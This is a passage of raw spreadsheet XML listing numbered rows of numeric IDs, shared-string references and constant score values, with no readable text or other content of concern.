        <v>2.1688356E7</v>
      </c>
      <c r="C21709" s="2" t="s">
        <v>20960</v>
      </c>
      <c r="D21709" s="2">
        <v>1.0</v>
      </c>
      <c r="E21709" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21709" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21710" ht="15.75" customHeight="1">
      <c r="A21710" s="1">
        <v>11450.0</v>
      </c>
      <c r="B21710" s="2">
        <v>2.1790504E7</v>
      </c>
      <c r="C21710" s="2" t="s">
        <v>20961</v>
      </c>
      <c r="D21710" s="2">
        <v>1.0</v>
      </c>
      <c r="E21710" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21710" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21711" ht="15.75" customHeight="1">
      <c r="A21711" s="1">
        <v>11523.0</v>
      </c>
      <c r="B21711" s="2">
        <v>2.2373178E7</v>
      </c>
      <c r="C21711" s="2" t="s">
        <v>20962</v>
      </c>
      <c r="D21711" s="2">
        <v>1.0</v>
      </c>
      <c r="E21711" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21711" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21712" ht="15.75" customHeight="1">
      <c r="A21712" s="1">
        <v>11591.0</v>
      </c>
      <c r="B21712" s="2">
        <v>2.2892283E7</v>
      </c>
      <c r="C21712" s="2" t="s">
        <v>20963</v>
      </c>
      <c r="D21712" s="2">
        <v>1.0</v>
      </c>
      <c r="E21712" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21712" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21713" ht="15.75" customHeight="1">
      <c r="A21713" s="1">
        <v>11595.0</v>
      </c>
      <c r="B21713" s="2">
        <v>2.2911212E7</v>
      </c>
      <c r="C21713" s="2" t="s">
        <v>20964</v>
      </c>
      <c r="D21713" s="2">
        <v>1.0</v>
      </c>
      <c r="E21713" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21713" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21714" ht="15.75" customHeight="1">
      <c r="A21714" s="1">
        <v>11659.0</v>
      </c>
      <c r="B21714" s="2">
        <v>2331661.0</v>
      </c>
      <c r="C21714" s="2" t="s">
        <v>20965</v>
      </c>
      <c r="D21714" s="2">
        <v>1.0</v>
      </c>
      <c r="E21714" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21714" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21715" ht="15.75" customHeight="1">
      <c r="A21715" s="1">
        <v>12544.0</v>
      </c>
      <c r="B21715" s="2">
        <v>2.9828896E7</v>
      </c>
      <c r="C21715" s="2" t="s">
        <v>20966</v>
      </c>
      <c r="D21715" s="2">
        <v>1.0</v>
      </c>
      <c r="E21715" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21715" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21716" ht="15.75" customHeight="1">
      <c r="A21716" s="1">
        <v>12927.0</v>
      </c>
      <c r="B21716" s="2">
        <v>3.2311144E7</v>
      </c>
      <c r="C21716" s="2" t="s">
        <v>20967</v>
      </c>
      <c r="D21716" s="2">
        <v>1.0</v>
      </c>
      <c r="E21716" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21716" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21717" ht="15.75" customHeight="1">
      <c r="A21717" s="1">
        <v>12988.0</v>
      </c>
      <c r="B21717" s="2">
        <v>3.2726838E7</v>
      </c>
      <c r="C21717" s="2" t="s">
        <v>20968</v>
      </c>
      <c r="D21717" s="2">
        <v>1.0</v>
      </c>
      <c r="E21717" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21717" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21718" ht="15.75" customHeight="1">
      <c r="A21718" s="1">
        <v>13196.0</v>
      </c>
      <c r="B21718" s="2">
        <v>3.4101159E7</v>
      </c>
      <c r="C21718" s="2" t="s">
        <v>20969</v>
      </c>
      <c r="D21718" s="2">
        <v>1.0</v>
      </c>
      <c r="E21718" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21718" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21719" ht="15.75" customHeight="1">
      <c r="A21719" s="1">
        <v>13230.0</v>
      </c>
      <c r="B21719" s="2">
        <v>3.4239275E7</v>
      </c>
      <c r="C21719" s="2" t="s">
        <v>20970</v>
      </c>
      <c r="D21719" s="2">
        <v>1.0</v>
      </c>
      <c r="E21719" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21719" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21720" ht="15.75" customHeight="1">
      <c r="A21720" s="1">
        <v>13390.0</v>
      </c>
      <c r="B21720" s="2">
        <v>3.4947199E7</v>
      </c>
      <c r="C21720" s="2" t="s">
        <v>20971</v>
      </c>
      <c r="D21720" s="2">
        <v>1.0</v>
      </c>
      <c r="E21720" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21720" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21721" ht="15.75" customHeight="1">
      <c r="A21721" s="1">
        <v>13646.0</v>
      </c>
      <c r="B21721" s="2">
        <v>3.5919328E7</v>
      </c>
      <c r="C21721" s="2" t="s">
        <v>20972</v>
      </c>
      <c r="D21721" s="2">
        <v>1.0</v>
      </c>
      <c r="E21721" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21721" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21722" ht="15.75" customHeight="1">
      <c r="A21722" s="1">
        <v>14085.0</v>
      </c>
      <c r="B21722" s="2">
        <v>3.7703745E7</v>
      </c>
      <c r="C21722" s="2" t="s">
        <v>20973</v>
      </c>
      <c r="D21722" s="2">
        <v>1.0</v>
      </c>
      <c r="E21722" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21722" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21723" ht="15.75" customHeight="1">
      <c r="A21723" s="1">
        <v>14152.0</v>
      </c>
      <c r="B21723" s="2">
        <v>3.7990743E7</v>
      </c>
      <c r="C21723" s="2" t="s">
        <v>20974</v>
      </c>
      <c r="D21723" s="2">
        <v>1.0</v>
      </c>
      <c r="E21723" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21723" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21724" ht="15.75" customHeight="1">
      <c r="A21724" s="1">
        <v>14162.0</v>
      </c>
      <c r="B21724" s="2">
        <v>3.80186E7</v>
      </c>
      <c r="C21724" s="2" t="s">
        <v>20975</v>
      </c>
      <c r="D21724" s="2">
        <v>1.0</v>
      </c>
      <c r="E21724" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21724" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21725" ht="15.75" customHeight="1">
      <c r="A21725" s="1">
        <v>14291.0</v>
      </c>
      <c r="B21725" s="2">
        <v>3.8509235E7</v>
      </c>
      <c r="C21725" s="2" t="s">
        <v>20976</v>
      </c>
      <c r="D21725" s="2">
        <v>1.0</v>
      </c>
      <c r="E21725" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21725" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21726" ht="15.75" customHeight="1">
      <c r="A21726" s="1">
        <v>14363.0</v>
      </c>
      <c r="B21726" s="2">
        <v>3.8951353E7</v>
      </c>
      <c r="C21726" s="2" t="s">
        <v>20977</v>
      </c>
      <c r="D21726" s="2">
        <v>1.0</v>
      </c>
      <c r="E21726" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21726" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21727" ht="15.75" customHeight="1">
      <c r="A21727" s="1">
        <v>14531.0</v>
      </c>
      <c r="B21727" s="2">
        <v>3.982831E7</v>
      </c>
      <c r="C21727" s="2" t="s">
        <v>20978</v>
      </c>
      <c r="D21727" s="2">
        <v>1.0</v>
      </c>
      <c r="E21727" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21727" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21728" ht="15.75" customHeight="1">
      <c r="A21728" s="1">
        <v>14789.0</v>
      </c>
      <c r="B21728" s="2">
        <v>4.0918163E7</v>
      </c>
      <c r="C21728" s="2" t="s">
        <v>20979</v>
      </c>
      <c r="D21728" s="2">
        <v>1.0</v>
      </c>
      <c r="E21728" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21728" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21729" ht="15.75" customHeight="1">
      <c r="A21729" s="1">
        <v>14818.0</v>
      </c>
      <c r="B21729" s="2">
        <v>4.0958096E7</v>
      </c>
      <c r="C21729" s="2" t="s">
        <v>20980</v>
      </c>
      <c r="D21729" s="2">
        <v>1.0</v>
      </c>
      <c r="E21729" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21729" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21730" ht="15.75" customHeight="1">
      <c r="A21730" s="1">
        <v>14904.0</v>
      </c>
      <c r="B21730" s="2">
        <v>4.1162164E7</v>
      </c>
      <c r="C21730" s="2" t="s">
        <v>20981</v>
      </c>
      <c r="D21730" s="2">
        <v>1.0</v>
      </c>
      <c r="E21730" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21730" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21731" ht="15.75" customHeight="1">
      <c r="A21731" s="1">
        <v>15072.0</v>
      </c>
      <c r="B21731" s="2">
        <v>4.1721377E7</v>
      </c>
      <c r="C21731" s="2" t="s">
        <v>20982</v>
      </c>
      <c r="D21731" s="2">
        <v>1.0</v>
      </c>
      <c r="E21731" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21731" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21732" ht="15.75" customHeight="1">
      <c r="A21732" s="1">
        <v>15160.0</v>
      </c>
      <c r="B21732" s="2">
        <v>4.1988431E7</v>
      </c>
      <c r="C21732" s="2" t="s">
        <v>20895</v>
      </c>
      <c r="D21732" s="2">
        <v>1.0</v>
      </c>
      <c r="E21732" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21732" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21733" ht="15.75" customHeight="1">
      <c r="A21733" s="1">
        <v>15165.0</v>
      </c>
      <c r="B21733" s="2">
        <v>4.2001725E7</v>
      </c>
      <c r="C21733" s="2" t="s">
        <v>20983</v>
      </c>
      <c r="D21733" s="2">
        <v>1.0</v>
      </c>
      <c r="E21733" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21733" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21734" ht="15.75" customHeight="1">
      <c r="A21734" s="1">
        <v>15994.0</v>
      </c>
      <c r="B21734" s="2">
        <v>4.4951279E7</v>
      </c>
      <c r="C21734" s="2" t="s">
        <v>20984</v>
      </c>
      <c r="D21734" s="2">
        <v>1.0</v>
      </c>
      <c r="E21734" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21734" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21735" ht="15.75" customHeight="1">
      <c r="A21735" s="1">
        <v>16064.0</v>
      </c>
      <c r="B21735" s="2">
        <v>4.5306531E7</v>
      </c>
      <c r="C21735" s="2" t="s">
        <v>20985</v>
      </c>
      <c r="D21735" s="2">
        <v>1.0</v>
      </c>
      <c r="E21735" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21735" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21736" ht="15.75" customHeight="1">
      <c r="A21736" s="1">
        <v>16190.0</v>
      </c>
      <c r="B21736" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C21736" s="2" t="s">
        <v>20910</v>
      </c>
      <c r="D21736" s="2">
        <v>1.0</v>
      </c>
      <c r="E21736" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21736" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21737" ht="15.75" customHeight="1">
      <c r="A21737" s="1">
        <v>16273.0</v>
      </c>
      <c r="B21737" s="2">
        <v>4.5785271E7</v>
      </c>
      <c r="C21737" s="2" t="s">
        <v>20986</v>
      </c>
      <c r="D21737" s="2">
        <v>1.0</v>
      </c>
      <c r="E21737" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21737" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21738" ht="15.75" customHeight="1">
      <c r="A21738" s="1">
        <v>16275.0</v>
      </c>
      <c r="B21738" s="2">
        <v>4.5792575E7</v>
      </c>
      <c r="C21738" s="2" t="s">
        <v>20987</v>
      </c>
      <c r="D21738" s="2">
        <v>1.0</v>
      </c>
      <c r="E21738" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21738" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21739" ht="15.75" customHeight="1">
      <c r="A21739" s="1">
        <v>16303.0</v>
      </c>
      <c r="B21739" s="2">
        <v>4.590715E7</v>
      </c>
      <c r="C21739" s="2" t="s">
        <v>20988</v>
      </c>
      <c r="D21739" s="2">
        <v>1.0</v>
      </c>
      <c r="E21739" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21739" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21740" ht="15.75" customHeight="1">
      <c r="A21740" s="1">
        <v>16748.0</v>
      </c>
      <c r="B21740" s="2">
        <v>4.7587055E7</v>
      </c>
      <c r="C21740" s="2" t="s">
        <v>20989</v>
      </c>
      <c r="D21740" s="2">
        <v>1.0</v>
      </c>
      <c r="E21740" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21740" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21741" ht="15.75" customHeight="1">
      <c r="A21741" s="1">
        <v>17039.0</v>
      </c>
      <c r="B21741" s="2">
        <v>4.8511225E7</v>
      </c>
      <c r="C21741" s="2" t="s">
        <v>20990</v>
      </c>
      <c r="D21741" s="2">
        <v>1.0</v>
      </c>
      <c r="E21741" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21741" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21742" ht="15.75" customHeight="1">
      <c r="A21742" s="1">
        <v>17177.0</v>
      </c>
      <c r="B21742" s="2">
        <v>4.8901885E7</v>
      </c>
      <c r="C21742" s="2" t="s">
        <v>20991</v>
      </c>
      <c r="D21742" s="2">
        <v>1.0</v>
      </c>
      <c r="E21742" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21742" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21743" ht="15.75" customHeight="1">
      <c r="A21743" s="1">
        <v>17207.0</v>
      </c>
      <c r="B21743" s="2">
        <v>4.9037054E7</v>
      </c>
      <c r="C21743" s="2" t="s">
        <v>20992</v>
      </c>
      <c r="D21743" s="2">
        <v>1.0</v>
      </c>
      <c r="E21743" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21743" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21744" ht="15.75" customHeight="1">
      <c r="A21744" s="1">
        <v>17236.0</v>
      </c>
      <c r="B21744" s="2">
        <v>4.907855E7</v>
      </c>
      <c r="C21744" s="2" t="s">
        <v>20993</v>
      </c>
      <c r="D21744" s="2">
        <v>1.0</v>
      </c>
      <c r="E21744" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21744" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21745" ht="15.75" customHeight="1">
      <c r="A21745" s="1">
        <v>17542.0</v>
      </c>
      <c r="B21745" s="2">
        <v>5.0144852E7</v>
      </c>
      <c r="C21745" s="2" t="s">
        <v>20994</v>
      </c>
      <c r="D21745" s="2">
        <v>1.0</v>
      </c>
      <c r="E21745" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21745" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21746" ht="15.75" customHeight="1">
      <c r="A21746" s="1">
        <v>17762.0</v>
      </c>
      <c r="B21746" s="2">
        <v>5.0732246E7</v>
      </c>
      <c r="C21746" s="2" t="s">
        <v>20995</v>
      </c>
      <c r="D21746" s="2">
        <v>1.0</v>
      </c>
      <c r="E21746" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21746" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21747" ht="15.75" customHeight="1">
      <c r="A21747" s="1">
        <v>17831.0</v>
      </c>
      <c r="B21747" s="2">
        <v>5.0921976E7</v>
      </c>
      <c r="C21747" s="2" t="s">
        <v>20996</v>
      </c>
      <c r="D21747" s="2">
        <v>1.0</v>
      </c>
      <c r="E21747" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21747" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21748" ht="15.75" customHeight="1">
      <c r="A21748" s="1">
        <v>17919.0</v>
      </c>
      <c r="B21748" s="2">
        <v>5.1158973E7</v>
      </c>
      <c r="C21748" s="2" t="s">
        <v>20997</v>
      </c>
      <c r="D21748" s="2">
        <v>1.0</v>
      </c>
      <c r="E21748" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21748" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21749" ht="15.75" customHeight="1">
      <c r="A21749" s="1">
        <v>18193.0</v>
      </c>
      <c r="B21749" s="2">
        <v>5.2030692E7</v>
      </c>
      <c r="C21749" s="2" t="s">
        <v>20998</v>
      </c>
      <c r="D21749" s="2">
        <v>1.0</v>
      </c>
      <c r="E21749" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21749" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21750" ht="15.75" customHeight="1">
      <c r="A21750" s="1">
        <v>18367.0</v>
      </c>
      <c r="B21750" s="2">
        <v>5256924.0</v>
      </c>
      <c r="C21750" s="2" t="s">
        <v>20999</v>
      </c>
      <c r="D21750" s="2">
        <v>1.0</v>
      </c>
      <c r="E21750" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21750" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21751" ht="15.75" customHeight="1">
      <c r="A21751" s="1">
        <v>18608.0</v>
      </c>
      <c r="B21751" s="2">
        <v>5.3317508E7</v>
      </c>
      <c r="C21751" s="2" t="s">
        <v>21000</v>
      </c>
      <c r="D21751" s="2">
        <v>1.0</v>
      </c>
      <c r="E21751" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21751" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21752" ht="15.75" customHeight="1">
      <c r="A21752" s="1">
        <v>19098.0</v>
      </c>
      <c r="B21752" s="2">
        <v>5.4680115E7</v>
      </c>
      <c r="C21752" s="2" t="s">
        <v>21001</v>
      </c>
      <c r="D21752" s="2">
        <v>1.0</v>
      </c>
      <c r="E21752" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21752" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21753" ht="15.75" customHeight="1">
      <c r="A21753" s="1">
        <v>19809.0</v>
      </c>
      <c r="B21753" s="2">
        <v>5.6916236E7</v>
      </c>
      <c r="C21753" s="2" t="s">
        <v>21002</v>
      </c>
      <c r="D21753" s="2">
        <v>1.0</v>
      </c>
      <c r="E21753" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21753" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21754" ht="15.75" customHeight="1">
      <c r="A21754" s="1">
        <v>19880.0</v>
      </c>
      <c r="B21754" s="2">
        <v>5.7254314E7</v>
      </c>
      <c r="C21754" s="2" t="s">
        <v>21003</v>
      </c>
      <c r="D21754" s="2">
        <v>1.0</v>
      </c>
      <c r="E21754" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21754" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21755" ht="15.75" customHeight="1">
      <c r="A21755" s="1">
        <v>20042.0</v>
      </c>
      <c r="B21755" s="2">
        <v>7743205.0</v>
      </c>
      <c r="C21755" s="2" t="s">
        <v>21004</v>
      </c>
      <c r="D21755" s="2">
        <v>1.0</v>
      </c>
      <c r="E21755" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21755" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21756" ht="15.75" customHeight="1">
      <c r="A21756" s="1">
        <v>20185.0</v>
      </c>
      <c r="B21756" s="2">
        <v>1.0500616E7</v>
      </c>
      <c r="C21756" s="2" t="s">
        <v>21005</v>
      </c>
      <c r="D21756" s="2">
        <v>1.0</v>
      </c>
      <c r="E21756" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21756" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21757" ht="15.75" customHeight="1">
      <c r="A21757" s="1">
        <v>20209.0</v>
      </c>
      <c r="B21757" s="2">
        <v>1.0671859E7</v>
      </c>
      <c r="C21757" s="2" t="s">
        <v>21006</v>
      </c>
      <c r="D21757" s="2">
        <v>1.0</v>
      </c>
      <c r="E21757" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21757" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21758" ht="15.75" customHeight="1">
      <c r="A21758" s="1">
        <v>20489.0</v>
      </c>
      <c r="B21758" s="2">
        <v>1.2867376E7</v>
      </c>
      <c r="C21758" s="2" t="s">
        <v>21007</v>
      </c>
      <c r="D21758" s="2">
        <v>1.0</v>
      </c>
      <c r="E21758" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21758" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21759" ht="15.75" customHeight="1">
      <c r="A21759" s="1">
        <v>21140.0</v>
      </c>
      <c r="B21759" s="2">
        <v>1.8562069E7</v>
      </c>
      <c r="C21759" s="2" t="s">
        <v>21008</v>
      </c>
      <c r="D21759" s="2">
        <v>1.0</v>
      </c>
      <c r="E21759" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21759" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21760" ht="15.75" customHeight="1">
      <c r="A21760" s="1">
        <v>22183.0</v>
      </c>
      <c r="B21760" s="2">
        <v>3.1722037E7</v>
      </c>
      <c r="C21760" s="2" t="s">
        <v>21009</v>
      </c>
      <c r="D21760" s="2">
        <v>1.0</v>
      </c>
      <c r="E21760" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21760" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21761" ht="15.75" customHeight="1">
      <c r="A21761" s="1">
        <v>22911.0</v>
      </c>
      <c r="B21761" s="2">
        <v>4.8281672E7</v>
      </c>
      <c r="C21761" s="2" t="s">
        <v>21010</v>
      </c>
      <c r="D21761" s="2">
        <v>1.0</v>
      </c>
      <c r="E21761" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21761" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21762" ht="15.75" customHeight="1">
      <c r="A21762" s="1">
        <v>23366.0</v>
      </c>
      <c r="B21762" s="2">
        <v>5.5195448E7</v>
      </c>
      <c r="C21762" s="2" t="s">
        <v>21011</v>
      </c>
      <c r="D21762" s="2">
        <v>1.0</v>
      </c>
      <c r="E21762" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21762" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21763" ht="15.75" customHeight="1">
      <c r="A21763" s="1">
        <v>24599.0</v>
      </c>
      <c r="B21763" s="2">
        <v>1.1415052E7</v>
      </c>
      <c r="C21763" s="2" t="s">
        <v>21012</v>
      </c>
      <c r="D21763" s="2">
        <v>1.0</v>
      </c>
      <c r="E21763" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21763" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21764" ht="15.75" customHeight="1">
      <c r="A21764" s="1">
        <v>25055.0</v>
      </c>
      <c r="B21764" s="2">
        <v>1.2867375E7</v>
      </c>
      <c r="C21764" s="2" t="s">
        <v>21007</v>
      </c>
      <c r="D21764" s="2">
        <v>1.0</v>
      </c>
      <c r="E21764" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21764" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21765" ht="15.75" customHeight="1">
      <c r="A21765" s="1">
        <v>26584.0</v>
      </c>
      <c r="B21765" s="2">
        <v>1.7943095E7</v>
      </c>
      <c r="C21765" s="2" t="s">
        <v>21013</v>
      </c>
      <c r="D21765" s="2">
        <v>1.0</v>
      </c>
      <c r="E21765" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21765" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21766" ht="15.75" customHeight="1">
      <c r="A21766" s="1">
        <v>27594.0</v>
      </c>
      <c r="B21766" s="2">
        <v>2.2561374E7</v>
      </c>
      <c r="C21766" s="2" t="s">
        <v>21014</v>
      </c>
      <c r="D21766" s="2">
        <v>1.0</v>
      </c>
      <c r="E21766" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21766" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21767" ht="15.75" customHeight="1">
      <c r="A21767" s="1">
        <v>27775.0</v>
      </c>
      <c r="B21767" s="2">
        <v>2.3113671E7</v>
      </c>
      <c r="C21767" s="2" t="s">
        <v>21015</v>
      </c>
      <c r="D21767" s="2">
        <v>1.0</v>
      </c>
      <c r="E21767" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21767" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21768" ht="15.75" customHeight="1">
      <c r="A21768" s="1">
        <v>28407.0</v>
      </c>
      <c r="B21768" s="2">
        <v>2.628424E7</v>
      </c>
      <c r="C21768" s="2" t="s">
        <v>21016</v>
      </c>
      <c r="D21768" s="2">
        <v>1.0</v>
      </c>
      <c r="E21768" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21768" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21769" ht="15.75" customHeight="1">
      <c r="A21769" s="1">
        <v>29514.0</v>
      </c>
      <c r="B21769" s="2">
        <v>3.2761921E7</v>
      </c>
      <c r="C21769" s="2" t="s">
        <v>21017</v>
      </c>
      <c r="D21769" s="2">
        <v>1.0</v>
      </c>
      <c r="E21769" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21769" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21770" ht="15.75" customHeight="1">
      <c r="A21770" s="1">
        <v>29590.0</v>
      </c>
      <c r="B21770" s="2">
        <v>3.3521639E7</v>
      </c>
      <c r="C21770" s="2" t="s">
        <v>21018</v>
      </c>
      <c r="D21770" s="2">
        <v>1.0</v>
      </c>
      <c r="E21770" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21770" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21771" ht="15.75" customHeight="1">
      <c r="A21771" s="1">
        <v>32090.0</v>
      </c>
      <c r="B21771" s="2">
        <v>5399211.0</v>
      </c>
      <c r="C21771" s="2" t="s">
        <v>21019</v>
      </c>
      <c r="D21771" s="2">
        <v>1.0</v>
      </c>
      <c r="E21771" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21771" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21772" ht="15.75" customHeight="1">
      <c r="A21772" s="1">
        <v>33046.0</v>
      </c>
      <c r="B21772" s="2">
        <v>6750643.0</v>
      </c>
      <c r="C21772" s="2" t="s">
        <v>21020</v>
      </c>
      <c r="D21772" s="2">
        <v>1.0</v>
      </c>
      <c r="E21772" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21772" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21773" ht="15.75" customHeight="1">
      <c r="A21773" s="1">
        <v>33346.0</v>
      </c>
      <c r="B21773" s="2">
        <v>7599939.0</v>
      </c>
      <c r="C21773" s="2" t="s">
        <v>21021</v>
      </c>
      <c r="D21773" s="2">
        <v>1.0</v>
      </c>
      <c r="E21773" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21773" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21774" ht="15.75" customHeight="1">
      <c r="A21774" s="1">
        <v>33927.0</v>
      </c>
      <c r="B21774" s="2">
        <v>9281672.0</v>
      </c>
      <c r="C21774" s="2" t="s">
        <v>21022</v>
      </c>
      <c r="D21774" s="2">
        <v>1.0</v>
      </c>
      <c r="E21774" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21774" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21775" ht="15.75" customHeight="1">
      <c r="A21775" s="1">
        <v>2408.0</v>
      </c>
      <c r="B21775" s="2">
        <v>3.3469146E7</v>
      </c>
      <c r="C21775" s="2" t="s">
        <v>21023</v>
      </c>
      <c r="D21775" s="2">
        <v>1.0</v>
      </c>
      <c r="E21775" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21775" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21776" ht="15.75" customHeight="1">
      <c r="A21776" s="1">
        <v>5156.0</v>
      </c>
      <c r="B21776" s="2">
